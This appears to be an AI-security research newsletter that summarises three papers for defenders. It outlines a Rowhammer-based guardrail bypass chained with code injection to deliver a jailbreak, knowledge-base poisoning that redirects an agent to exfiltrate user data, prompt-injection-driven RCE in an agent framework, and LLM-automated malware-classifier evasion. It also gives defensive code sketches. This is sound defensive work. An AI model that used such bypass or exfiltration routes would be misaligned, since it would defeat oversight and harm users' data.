Issue #1 | 2026-03-17 | M. Hirani | TLP:GREEN | 3 papers

Research Radar: Issue #1

Radar Rating
  • TR – Threat Realism: How real is this attack today?
  • DU – Defensive Urgency: How urgently should defenders act?
  • NO – Novelty: How new is this attack class?
  • RM – Research Maturity: How solid is the evidence?
Each dimension is scored from 1 (low) to 5 (high).

This Week's Signal

  • Compound AI systems may inherit the full CVE attack surface. The Cascade paper shows that classical software vulnerabilities and hardware fault attacks can compose across model, software, and hardware boundaries in compound AI pipelines (RAP-2026-002).
  • Autonomous agent frameworks need execution-layer security, not just prompt filters. An OpenClaw security analysis identifies four vulnerability classes spanning prompt-injection-driven RCE, sequential tool attack chains, context amnesia, and supply chain contamination, and argues that content filtering alone is insufficient (RAP-2026-003).
  • LLMs automate adversarial attacks against ML classifiers. A dual-LLM agent architecture (LAMLAD) reports up to 97% evasion against Android malware detectors with an average of three query attempts; the paper's adversarial-training defence cuts the attack success rate (ASR) by more than 30% on average but still leaves Gemini-based pairings effective (RAP-2026-004).

ACT NOW

Cascade: Composing Software-Hardware Attack Gadgets for Adversarial Threat Amplification in Compound AI Systems

Authors: Sarbartha Banerjee, Prateek Sahu, Anjo Vahldiek-Oberwagner, Jose Sanchez Vicarte, Mohit Tiwari | arXiv: 2603.12023v1

Stream: S2: Agent Security | RAXE ID: RAP-2026-002

The paper demonstrates that classical software bugs and hardware fault attacks (Rowhammer bit-flips) can be chained to bypass AI guardrails and exfiltrate data from compound AI systems. It frames these cross-layer weaknesses as attack gadgets that compose across model, software, and hardware boundaries. Organisations deploying compound AI pipelines – particularly RAG stacks and LLM agents – should not assume their AI-specific safety layers compensate for unpatched infrastructure vulnerabilities (RAXE assessment).

The authors present two concrete end-to-end compositions: one combines a software code injection flaw with a Rowhammer-based guardrail bypass to inject an unaltered jailbreak prompt, and another manipulates the knowledge database to redirect an agent into sending sensitive user data to a malicious application. The paper positions these compositions as evidence that defenders need cross-stack red-teaming, not component-by-component hardening.

Defender action: Patch all CVE-tracked components in AI inference infrastructure on the standard enterprise schedule. Treat the retrieval corpus of any RAG or agentic deployment as a high-integrity trust boundary. Evaluate ECC memory for guardrail-hosting infrastructure (RAXE assessment).
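One way to make the "high-integrity trust boundary" concrete is to gate corpus ingestion on an approved-content manifest. The sketch below is a minimal illustration of that idea (not from the paper); `verify_corpus`, the document IDs, and the manifest format are all hypothetical names for this example.

```python
import hashlib

def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def verify_corpus(documents: dict, manifest: dict) -> list:
    """Return IDs of documents whose hash does not match the approved
    manifest; these should be quarantined, not indexed for retrieval."""
    tampered = []
    for doc_id, content in documents.items():
        expected = manifest.get(doc_id)
        if expected is None or sha256(content) != expected:
            tampered.append(doc_id)
    return tampered

# Example: one document was silently modified after approval.
manifest = {"kb-001": sha256(b"approved policy text"),
            "kb-002": sha256(b"approved FAQ text")}
docs = {"kb-001": b"approved policy text",
        "kb-002": b"poisoned FAQ text"}  # corpus tampering
print(verify_corpus(docs, manifest))  # -> ['kb-002']
```

The point is that integrity checking happens before the retriever ever sees a document, so a knowledge-base manipulation of the kind Cascade describes must defeat the manifest, not just the guardrail.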

Threat Realism: 4 | Defensive Urgency: 4 | Novelty: 5 | Research Maturity: 3

Uncovering Security Threats and Architecting Defenses in Autonomous Agents: A Case Study of OpenClaw

Authors: Zonghao Ying, Xiao Yang, Siyang Wu et al. | arXiv: 2603.12644v1

Stream: S2: Agent Security | RAXE ID: RAP-2026-003

The paper presents a comprehensive security analysis of OpenClaw, an autonomous agent framework that exposes OS-level capabilities to LLM-driven workflows. It identifies four recurring vulnerability classes: prompt-injection-driven RCE, sequential tool attack chains, context amnesia, and supply chain contamination.

Rather than presenting a conventional exploit benchmark, the paper maps these risks to observed OpenClaw ecosystem weaknesses – including poisoned Skills/plugins, token-theft-to-RCE paths, and persistent memory pollution – and then proposes the Full-Lifecycle Agent Security Architecture (FASA) as a defence blueprint. Project ClawGuard is described as an ongoing implementation effort rather than a finished defence platform.

Analyst note: Abstract discrepancy detected between initial brief and API-verified source. Quantitative figures (92% ASR, less than 5% residual) could not be verified from the abstract and are excluded.

Defender action: Treat the four vulnerability classes as an immediate audit checklist for any autonomous agent deployment. Content-filtering defences are architecturally insufficient for tool-calling agents (Abstract). Review the ClawGuard repository for released mitigation tooling (RAXE assessment).
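To illustrate what "execution-layer security, not just prompt filters" means in practice, the sketch below enforces a tool allowlist with per-tool argument validation at dispatch time. This is a hypothetical illustration, not OpenClaw's or FASA's actual design; `ALLOWED_TOOLS`, `dispatch`, and the tool names are invented for the example.

```python
# Hypothetical execution-layer policy: which tools an agent may call,
# plus a per-tool argument validator. Enforced when the tool call is
# dispatched, independently of any prompt-level content filter.
ALLOWED_TOOLS = {
    "read_file": lambda args: str(args.get("path", "")).startswith("/workspace/"),
    "web_search": lambda args: True,
}

def dispatch(tool: str, args: dict) -> str:
    validator = ALLOWED_TOOLS.get(tool)
    if validator is None:
        return f"DENY: tool '{tool}' not on allowlist"
    if not validator(args):
        return f"DENY: arguments rejected for '{tool}'"
    return f"ALLOW: {tool}"

print(dispatch("shell_exec", {"cmd": "curl evil.sh | sh"}))   # denied: not allowlisted
print(dispatch("read_file", {"path": "/etc/shadow"}))         # denied: path outside workspace
print(dispatch("read_file", {"path": "/workspace/notes.md"})) # allowed
```

Even a successful prompt injection then yields only tool calls the policy permits, which directly addresses the prompt-injection-to-RCE class above.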

Threat Realism: 4 | Defensive Urgency: 4 | Novelty: 3 | Research Maturity: 2

WATCH

LLM-Driven Feature-Level Adversarial Attacks on Android Malware Detectors

Authors: Tianwei Lan, Farid Nait-Abdesselam | arXiv: 2512.21404v1

Stream: S1: Adversarial ML | RAXE ID: RAP-2026-004

A dual-LLM agent architecture (LAMLAD) automates feature-level adversarial attacks against ML-based Android malware classifiers, achieving evasion rates of up to 97% with an average of three query attempts while preserving malicious functionality. The paper also evaluates adversarial training as a defence, reporting ASR reductions greater than 30% across all tested detectors; Gemini-based pairings remain the strongest attacks even after hardening (RAXE assessment).

Analyst note: Abstract conflict detected – initial brief cited "FeatureLLM" with 88.6%, API-verified abstract says "LAMLAD" with 97%. Verified version used throughout.

Defender action: Organisations operating ML-based endpoint classifiers should evaluate whether Drebin-style feature representations remain fit for purpose against automated perturbation tools. Monitor query patterns for automated perturbation loops (RAXE assessment).
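A simple way to surface automated perturbation loops is to flag clients whose consecutive submissions are near-duplicates of one another – the signature of an agent making small feature edits between queries. The sketch below is a hypothetical monitor (not from the paper); `PerturbationLoopMonitor` and its thresholds are invented for illustration.

```python
from collections import defaultdict, deque

def jaccard(a: set, b: set) -> float:
    """Set similarity in [0, 1]; 1.0 means identical feature sets."""
    return len(a & b) / len(a | b) if a | b else 1.0

class PerturbationLoopMonitor:
    """Flag a client when several recent submissions are near-duplicates
    of the current one, suggesting an automated perturbation loop."""
    def __init__(self, window=5, sim_threshold=0.9, min_hits=3):
        self.history = defaultdict(lambda: deque(maxlen=window))
        self.sim_threshold = sim_threshold
        self.min_hits = min_hits

    def observe(self, client_id: str, features: set) -> bool:
        hits = sum(1 for past in self.history[client_id]
                   if jaccard(features, past) >= self.sim_threshold)
        self.history[client_id].append(features)
        return hits >= self.min_hits  # True => suspicious client

monitor = PerturbationLoopMonitor()
base = set(range(100))
for i in range(6):
    # Each query differs from the last by a single added feature.
    flagged = monitor.observe("client-1", base | {1000 + i})
print(flagged)  # -> True
```

Against an attacker averaging three query attempts, tight flagging thresholds matter; treat this as a detection signal to combine with rate limiting, not a standalone control.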

Threat Realism: 4 | Defensive Urgency: 3 | Novelty: 4 | Research Maturity: 3

Stream Coverage

Stream | Papers This Week | Coverage
S1: Adversarial ML | 1 | LAMLAD dual-agent adversarial attacks
S2: Agent Security | 2 | Cascade compound attacks + OpenClaw threat analysis
S3: Supply Chain | 0 | No papers selected this week
S4: Prompt Injection | 0 | No verified papers this week; candidates available for Issue #2

Methodology and Transparency

RAXE Research Radar scans arXiv weekly for AI security papers, selects the most relevant for full reading, and produces practitioner-focused summaries. Every paper is verified to exist via the arXiv API before content work begins. For Issue #1, all three selected papers were manually checked against the full paper text before publication, and unsupported claims were removed or rewritten.

Anti-hallucination protocol: RAXE does not publish quantitative or exploit-detail claims from automated extraction alone. When a statement cannot be substantiated against the source text, it is downgraded or removed rather than shipped provisionally. This conservative approach prioritises accuracy over depth.


RAXE Research Radar Issue #1 – Published 2026-03-17 | RAXE Labs – Independent AI Threat Intelligence